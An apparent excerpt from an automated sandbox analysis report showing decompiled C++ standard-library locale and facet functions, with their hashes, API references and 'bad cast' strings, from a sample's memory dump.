API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: ,FF$bad cast
API String ID: 2525416601-3405628359
Opcode ID: e5db015f0a6d026e772b788b542e08571bc248fd34cf92a6dc872f8f36290085
Instruction ID: 5c5125dc1226cb592b3b74a438543bbe377d518ae37a633d4c41d96e62fb4ce5
Opcode Fuzzy Hash: e5db015f0a6d026e772b788b542e08571bc248fd34cf92a6dc872f8f36290085
Instruction Fuzzy Hash: CF01A171D00115A7CF05EBA1A802ABE7235AF84764F64052FF4117B2E1DF7C9A05C79D

Uniqueness

Uniqueness Score: -1.00%

Function 0043DEBF Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043DEBF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645e8; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043D196(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645e8 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043debf
0x0043dec6
0x0043ded0
0x0043ded5
0x0043dedb
0x0043dee4
0x0043dee7
0x0043deec
0x0043def0
0x0043def5
0x0043def9
0x0043defd
0x0043df03
0x0043df09
0x0043df0a
0x0043df11
0x0043df14
0x0043df1e
0x0043df2c
0x0043df2c
0x0043df31
0x0043df36
0x0043df3c
0x0043df42
0x0043deff
0x0043deff
0x0043deff
0x0043defd
0x0043df48
0x0043df4f
0x0043df5b

APIs

__EH_prolog3.LIBCMT ref: 0043DEC6
std::_Lockit::_Lockit.LIBCPMT ref: 0043DED0

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 0043DF0A
std::bad_exception::bad_exception.LIBCMT ref: 0043DF1E
__CxxThrowException@8.LIBCMT ref: 0043DF2C
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043DF42

Strings

bad cast, xrefs: 0043DF16
`FF, xrefs: 0043DEDF

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: `FF$bad cast
API String ID: 1676052248-4287904182
Opcode ID: 776b14474dbb246e1d2ab3a0d501559360c5c76a35485ac43c7e96d94c336cb5
Instruction ID: ca7bb6a2b77e90be24840f6b19e3d65b0612599aab353d8c8c8e8b571ae66201
Opcode Fuzzy Hash: 776b14474dbb246e1d2ab3a0d501559360c5c76a35485ac43c7e96d94c336cb5
Instruction Fuzzy Hash: 1001AD31E00215A7CF05EBA1E842AAE7235AF84724F64012FF5117B2E1DB7C9A04879E

Uniqueness

Uniqueness Score: -1.00%

Function 0043DFF9 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043DFF9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645f0; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043C93A(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645f0 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043dff9
0x0043e000
0x0043e00a
0x0043e00f
0x0043e015
0x0043e01e
0x0043e021
0x0043e026
0x0043e02a
0x0043e02f
0x0043e033
0x0043e037
0x0043e03d
0x0043e043
0x0043e044
0x0043e04b
0x0043e04e
0x0043e058
0x0043e066
0x0043e066
0x0043e06b
0x0043e070
0x0043e076
0x0043e07c
0x0043e039
0x0043e039
0x0043e039
0x0043e037
0x0043e082
0x0043e089
0x0043e095

APIs

__EH_prolog3.LIBCMT ref: 0043E000
std::_Lockit::_Lockit.LIBCPMT ref: 0043E00A

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 0043E044
std::bad_exception::bad_exception.LIBCMT ref: 0043E058
__CxxThrowException@8.LIBCMT ref: 0043E066
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043E07C

Strings

bad cast, xrefs: 0043E050
P5F, xrefs: 0043E019

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: P5F$bad cast
API String ID: 1676052248-2357017408
Opcode ID: 4522fa3d8d0d4a29350ea911e74445c5bfdc80032e5c597dc3ecc43d43605870
Instruction ID: b9c647df5403ab059f806416746cf38fc30c72c4a019379f07ef25c35abd1f1e
Opcode Fuzzy Hash: 4522fa3d8d0d4a29350ea911e74445c5bfdc80032e5c597dc3ecc43d43605870
Instruction Fuzzy Hash: 9B01A171900125A7CF05EBA1D812BBE7235AF84768F64052FF4217B2E1DFBC9A05879D

Uniqueness

Uniqueness Score: -1.00%

Function 00403170 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00403170(char _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				signed int _t29;
				intOrPtr _t33;
				void* _t37;
				intOrPtr _t39;
				void* _t45;
				signed int _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t54;
				signed int _t70;
				intOrPtr _t71;
				void* _t73;
				signed int _t74;
				void* _t76;

				_push(0xffffffff);
				_push(E0044DAE8);
				_push( *[fs:0x0]);
				_t74 = _t73 - 0x18;
				_t29 =  *0x4608e0; // 0xb51ec2b3
				_push(_t29 ^ _t74);
				 *[fs:0x0] =  &_v12;
				E0040D950( &_v28, 0);
				_t51 =  *0x462724; // 0x22310d0
				_v8 = 0;
				_v40 = _t51;
				if( *0x46354c == 0) {
					E0040D950( &_v32, 0);
					if( *0x46354c == 0) {
						_t48 =  *0x463548; // 0x27
						_t49 = _t48 + 1;
						 *0x463548 = _t49;
						 *0x46354c = _t49;
					}
					E0040D978( &_v32);
				}
				_t67 = _a4;
				_t70 =  *0x46354c; // 0x1
				_t33 =  *_a4;
				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
					_t54 = 0;
					goto L6;
				} else {
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
					if(_t54 != 0) {
						L10:
						_t71 = _t54;
						L11:
						if(_t71 != 0) {
							L19:
							_v4 = 0xffffffff;
							E0040D978( &_v28);
							 *[fs:0x0] = _v12;
							return _t71;
						}
						L12:
						if(_t51 == 0) {
							_t37 = E00402A50(_t54,  &_v36, _t67);
							_t76 = _t74 + 8;
							if(_t37 == 0xffffffff) {
								E004223BB( &_v24, "bad cast");
								E00422CB4( &_v28, 0x4597cc);
							}
							_t71 = _v36;
							 *0x462724 = _t71;
							E0040D950( &_a4, 0);
							_t39 =  *((intOrPtr*)(_t71 + 4));
							if(_t39 < 0xffffffff) {
								 *((intOrPtr*)(_t71 + 4)) = _t39 + 1;
							}
							E0040D978( &_a4);
							E0040D9A4( &_a4, _t71);
							_t74 = _t76 + 4;
						} else {
							_t71 = _t51;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t33 + 0x14)) == 0) {
						goto L10;
					}
					_t45 = E0040DA1B();
					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
					goto L11;
				}
			}

0x00403170
0x00403172
0x0040317d
0x0040317e
0x00403184
0x0040318b
0x00403190
0x0040319c
0x004031a8
0x004031ae
0x004031b6
0x004031ba
0x004031c2
0x004031ce
0x004031d0
0x004031d5
0x004031d6
0x004031db
0x004031db
0x004031e4
0x004031e4
0x004031e9
0x004031ed
0x004031f3
0x004031f8
0x0040321c
0x00000000
0x004031fa
0x004031fd
0x00403202
0x00403220
0x00403220
0x00403222
0x00403224
0x00403291
0x00403295
0x0040329d
0x004032a8
0x004032b6
0x004032b6
0x00403226
0x00403228
0x00403234
0x00403239
0x0040323f
0x0040324a
0x00403259
0x00403259
0x0040325e
0x00403268
0x0040326e
0x00403273
0x00403279
0x0040327c
0x0040327c
0x00403283
0x00403289
0x0040328e
0x0040322a
0x0040322a
0x0040322a
0x00000000
0x00403228
0x00403204
0x00403208
0x00000000
0x00000000
0x0040320a
0x00403212
0x00000000
0x00000000
0x00403217
0x00000000
0x00403217

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040319C
std::_Lockit::_Lockit.LIBCPMT ref: 004031C2
std::bad_exception::bad_exception.LIBCMT ref: 0040324A
__CxxThrowException@8.LIBCMT ref: 00403259
std::_Lockit::_Lockit.LIBCPMT ref: 0040326E
std::locale::facet::_Facet_Register.LIBCPMT ref: 00403289

Strings

bad cast, xrefs: 00403241

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 9d9e2d8b131ff2396bac55ac0ffd49ef317d6ba1f5d75af6ddf549e3f33fc3d7
Instruction ID: d2b812cd8163cf2ea46a9be9df32e792d05de9f1ae20637d87c6c05b899a4fb1
Opcode Fuzzy Hash: 9d9e2d8b131ff2396bac55ac0ffd49ef317d6ba1f5d75af6ddf549e3f33fc3d7
Instruction Fuzzy Hash: DF31E271904350ABC714EF11D840B5B7BE4BB94725F400A3FF852A32E1DB78AA08CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 004046B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E004046B0(char _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				signed int _t29;
				intOrPtr _t33;
				void* _t37;
				intOrPtr _t39;
				void* _t45;
				signed int _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t54;
				signed int _t70;
				intOrPtr _t71;
				void* _t73;
				signed int _t74;
				void* _t76;

				_push(0xffffffff);
				_push(E0044DAE8);
				_push( *[fs:0x0]);
				_t74 = _t73 - 0x18;
				_t29 =  *0x4608e0; // 0xb51ec2b3
				_push(_t29 ^ _t74);
				 *[fs:0x0] =  &_v12;
				E0040D950( &_v28, 0);
				_t51 =  *0x46272c; // 0x22314d8
				_v8 = 0;
				_v40 = _t51;
				if( *0x462734 == 0) {
					E0040D950( &_v32, 0);
					if( *0x462734 == 0) {
						_t48 =  *0x463548; // 0x27
						_t49 = _t48 + 1;
						 *0x463548 = _t49;
						 *0x462734 = _t49;
					}
					E0040D978( &_v32);
				}
				_t67 = _a4;
				_t70 =  *0x462734; // 0x3
				_t33 =  *_a4;
				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
					_t54 = 0;
					goto L6;
				} else {
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
					if(_t54 != 0) {
						L10:
						_t71 = _t54;
						L11:
						if(_t71 != 0) {
							L19:
							_v4 = 0xffffffff;
							E0040D978( &_v28);
							 *[fs:0x0] = _v12;
							return _t71;
						}
						L12:
						if(_t51 == 0) {
							_t37 = E004039B0(_t54,  &_v36, _t67);
							_t76 = _t74 + 8;
							if(_t37 == 0xffffffff) {
								E004223BB( &_v24, "bad cast");
								E00422CB4( &_v28, 0x4597cc);
							}
							_t71 = _v36;
							 *0x46272c = _t71;
							E0040D950( &_a4, 0);
							_t39 =  *((intOrPtr*)(_t71 + 4));
							if(_t39 < 0xffffffff) {
								 *((intOrPtr*)(_t71 + 4)) = _t39 + 1;
							}
							E0040D978( &_a4);
							E0040D9A4( &_a4, _t71);
							_t74 = _t76 + 4;
						} else {
							_t71 = _t51;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t33 + 0x14)) == 0) {
						goto L10;
					}
					_t45 = E0040DA1B();
					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
					goto L11;
				}
			}

0x004046b0
0x004046b2
0x004046bd
0x004046be
0x004046c4
0x004046cb
0x004046d0
0x004046dc
0x004046e8
0x004046ee
0x004046f6
0x004046fa
0x00404702
0x0040470e
0x00404710
0x00404715
0x00404716
0x0040471b
0x0040471b
0x00404724
0x00404724
0x00404729
0x0040472d
0x00404733
0x00404738
0x0040475c
0x00000000
0x0040473a
0x0040473d
0x00404742
0x00404760
0x00404760
0x00404762
0x00404764
0x004047d1
0x004047d5
0x004047dd
0x004047e8
0x004047f6
0x004047f6
0x00404766
0x00404768
0x00404774
0x00404779
0x0040477f
0x0040478a
0x00404799
0x00404799
0x0040479e
0x004047a8
0x004047ae
0x004047b3
0x004047b9
0x004047bc
0x004047bc
0x004047c3
0x004047c9
0x004047ce
0x0040476a
0x0040476a
0x0040476a
0x00000000
0x00404768
0x00404744
0x00404748
0x00000000
0x00000000
0x0040474a
0x00404752
0x00000000
0x00000000
0x00404757
0x00000000
0x00404757

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004046DC
std::_Lockit::_Lockit.LIBCPMT ref: 00404702
std::bad_exception::bad_exception.LIBCMT ref: 0040478A
__CxxThrowException@8.LIBCMT ref: 00404799
std::_Lockit::_Lockit.LIBCPMT ref: 004047AE
std::locale::facet::_Facet_Register.LIBCPMT ref: 004047C9

Strings

bad cast, xrefs: 00404781

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 1096909ba88aad8b97e19e53626dd88fec02b8d568d502718c3903aeededfd38
Instruction ID: 7852102225e97f786bd642de75635541b0b37e45693c402e97988fef74168048
Opcode Fuzzy Hash: 1096909ba88aad8b97e19e53626dd88fec02b8d568d502718c3903aeededfd38
Instruction Fuzzy Hash: 6831E3B15043409FC718EF20D990F5B77A0EB95724F40063FF952A32E1D778A808CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403860 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E00403860(char _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				signed int _t29;
				intOrPtr _t33;
				void* _t37;
				intOrPtr _t39;
				void* _t45;
				signed int _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t54;
				signed int _t70;
				intOrPtr _t71;
				void* _t73;
				signed int _t74;
				void* _t76;

				_push(0xffffffff);
				_push(E0044DAE8);
				_push( *[fs:0x0]);
				_t74 = _t73 - 0x18;
				_t29 =  *0x4608e0; // 0xb51ec2b3
				_push(_t29 ^ _t74);
				 *[fs:0x0] =  &_v12;
				E0040D950( &_v28, 0);
				_t51 =  *0x462728; // 0x22328d8
				_v8 = 0;
				_v40 = _t51;
				if( *0x462730 == 0) {
					E0040D950( &_v32, 0);
					if( *0x462730 == 0) {
						_t48 =  *0x463548; // 0x27
						_t49 = _t48 + 1;
						 *0x463548 = _t49;
						 *0x462730 = _t49;
					}
					E0040D978( &_v32);
				}
				_t67 = _a4;
				_t70 =  *0x462730; // 0x2
				_t33 =  *_a4;
				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
					_t54 = 0;
					goto L6;
				} else {
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
					if(_t54 != 0) {
						L10:
						_t71 = _t54;
						L11:
						if(_t71 != 0) {
							L19:
							_v4 = 0xffffffff;
							E0040D978( &_v28);
							 *[fs:0x0] = _v12;
							return _t71;
						}
						L12:
						if(_t51 == 0) {
							_t37 = E004032C0(_t54, _t65,  &_v36, _t67);
							_t76 = _t74 + 8;
							if(_t37 == 0xffffffff) {
								E004223BB( &_v24, "bad cast");
								E00422CB4( &_v28, 0x4597cc);
							}
							_t71 = _v36;
							 *0x462728 = _t71;
							E0040D950( &_a4, 0);
							_t39 =  *((intOrPtr*)(_t71 + 4));
							if(_t39 < 0xffffffff) {
								 *((intOrPtr*)(_t71 + 4)) = _t39 + 1;
							}
							E0040D978( &_a4);
							E0040D9A4( &_a4, _t71);
							_t74 = _t76 + 4;
						} else {
							_t71 = _t51;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t33 + 0x14)) == 0) {
						goto L10;
					}
					_t45 = E0040DA1B();
					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t65 =  *((intOrPtr*)(_t45 + 8));
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
					goto L11;
				}
			}

0x00403860
0x00403862
0x0040386d
0x0040386e
0x00403874
0x0040387b
0x00403880
0x0040388c
0x00403898
0x0040389e
0x004038a6
0x004038aa
0x004038b2
0x004038be
0x004038c0
0x004038c5
0x004038c6
0x004038cb
0x004038cb
0x004038d4
0x004038d4
0x004038d9
0x004038dd
0x004038e3
0x004038e8
0x0040390c
0x00000000
0x004038ea
0x004038ed
0x004038f2
0x00403910
0x00403910
0x00403912
0x00403914
0x00403981
0x00403985
0x0040398d
0x00403998
0x004039a6
0x004039a6
0x00403916
0x00403918
0x00403924
0x00403929
0x0040392f
0x0040393a
0x00403949
0x00403949
0x0040394e
0x00403958
0x0040395e
0x00403963
0x00403969
0x0040396c
0x0040396c
0x00403973
0x00403979
0x0040397e
0x0040391a
0x0040391a
0x0040391a
0x00000000
0x00403918
0x004038f4
0x004038f8
0x00000000
0x00000000
0x004038fa
0x00403902
0x00000000
0x00000000
0x00403904
0x00403907
0x00000000
0x00403907

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040388C
std::_Lockit::_Lockit.LIBCPMT ref: 004038B2
std::bad_exception::bad_exception.LIBCMT ref: 0040393A
__CxxThrowException@8.LIBCMT ref: 00403949
std::_Lockit::_Lockit.LIBCPMT ref: 0040395E
std::locale::facet::_Facet_Register.LIBCPMT ref: 00403979

Strings

bad cast, xrefs: 00403931

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 4932f8906264da95718f218242d0276037ca285c818005127566ee8e147b84fe
Instruction ID: 7616a7ab64cd69766441167857d439cc8564b3de278e2244e43ba262782c59d2
Opcode Fuzzy Hash: 4932f8906264da95718f218242d0276037ca285c818005127566ee8e147b84fe
Instruction Fuzzy Hash: 6531B3B19043409BC714EF14D881B5B7BA4FB54725F440A3EF852632D1D7B8AA48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0040BD30(char _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				signed int _t29;
				intOrPtr _t33;
				void* _t37;
				intOrPtr _t39;
				void* _t45;
				signed int _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t54;
				signed int _t70;
				intOrPtr _t71;
				void* _t73;
				signed int _t74;
				void* _t76;

				_push(0xffffffff);
				_push(E0044DAE8);
				_push( *[fs:0x0]);
				_t74 = _t73 - 0x18;
				_t29 =  *0x4608e0; // 0xb51ec2b3
				_push(_t29 ^ _t74);
				 *[fs:0x0] =  &_v12;
				E0040D950( &_v28, 0);
				_t51 =  *0x4632b8; // 0x2238d18
				_v8 = 0;
				_v40 = _t51;
				if( *0x462738 == 0) {
					E0040D950( &_v32, 0);
					if( *0x462738 == 0) {
						_t48 =  *0x463548; // 0x27
						_t49 = _t48 + 1;
						 *0x463548 = _t49;
						 *0x462738 = _t49;
					}
					E0040D978( &_v32);
				}
				_t67 = _a4;
				_t70 =  *0x462738; // 0x5
				_t33 =  *_a4;
				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
					_t54 = 0;
					goto L6;
				} else {
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
					if(_t54 != 0) {
						L10:
						_t71 = _t54;
						L11:
						if(_t71 != 0) {
							L19:
							_v4 = 0xffffffff;
							E0040D978( &_v28);
							 *[fs:0x0] = _v12;
							return _t71;
						}
						L12:
						if(_t51 == 0) {
							_t37 = E0040BC30(_t54,  &_v36, _t67);
							_t76 = _t74 + 8;
							if(_t37 == 0xffffffff) {
								E004223BB( &_v24, "bad cast");
								E00422CB4( &_v28, 0x4597cc);
							}
							_t71 = _v36;
							 *0x4632b8 = _t71;
							E0040D950( &_a4, 0);
							_t39 =  *((intOrPtr*)(_t71 + 4));
							if(_t39 < 0xffffffff) {
								 *((intOrPtr*)(_t71 + 4)) = _t39 + 1;
							}
							E0040D978( &_a4);
							E0040D9A4( &_a4, _t71);
							_t74 = _t76 + 4;
						} else {
							_t71 = _t51;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t33 + 0x14)) == 0) {
						goto L10;
					}
					_t45 = E0040DA1B();
					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
					goto L11;
				}
			}

0x0040bd30
0x0040bd32
0x0040bd3d
0x0040bd3e
0x0040bd44
0x0040bd4b
0x0040bd50
0x0040bd5c
0x0040bd68
0x0040bd6e
0x0040bd76
0x0040bd7a
0x0040bd82
0x0040bd8e
0x0040bd90
0x0040bd95
0x0040bd96
0x0040bd9b
0x0040bd9b
0x0040bda4
0x0040bda4
0x0040bda9
0x0040bdad
0x0040bdb3
0x0040bdb8
0x0040bddc
0x00000000
0x0040bdba
0x0040bdbd
0x0040bdc2
0x0040bde0
0x0040bde0
0x0040bde2
0x0040bde4
0x0040be51
0x0040be55
0x0040be5d
0x0040be68
0x0040be76
0x0040be76
0x0040bde6
0x0040bde8
0x0040bdf4
0x0040bdf9
0x0040bdff
0x0040be0a
0x0040be19
0x0040be19
0x0040be1e
0x0040be28
0x0040be2e
0x0040be33
0x0040be39
0x0040be3c
0x0040be3c
0x0040be43
0x0040be49
0x0040be4e
0x0040bdea
0x0040bdea
0x0040bdea
0x00000000
0x0040bde8
0x0040bdc4
0x0040bdc8
0x00000000
0x00000000
0x0040bdca
0x0040bdd2
0x00000000
0x00000000
0x0040bdd7
0x00000000
0x0040bdd7

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040BD5C
std::_Lockit::_Lockit.LIBCPMT ref: 0040BD82
std::bad_exception::bad_exception.LIBCMT ref: 0040BE0A
__CxxThrowException@8.LIBCMT ref: 0040BE19
std::_Lockit::_Lockit.LIBCPMT ref: 0040BE2E
std::locale::facet::_Facet_Register.LIBCPMT ref: 0040BE49

Strings

bad cast, xrefs: 0040BE01

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 5e200c51d59dd5583f5ac8a61054bd4caa08c6eebc859a951f352cb2cbc95a3e
Instruction ID: 13f14c090776440dc2f44aa6501bda95ea7b18d4ebc03ef721cf8039b0c031ce
Opcode Fuzzy Hash: 5e200c51d59dd5583f5ac8a61054bd4caa08c6eebc859a951f352cb2cbc95a3e
Instruction Fuzzy Hash: 3E31AD719043419BC714EF20C891B9BB7A0EB54724F540A3EF856A32E1DB78A848CBCA

Uniqueness

Uniqueness Score: -1.00%

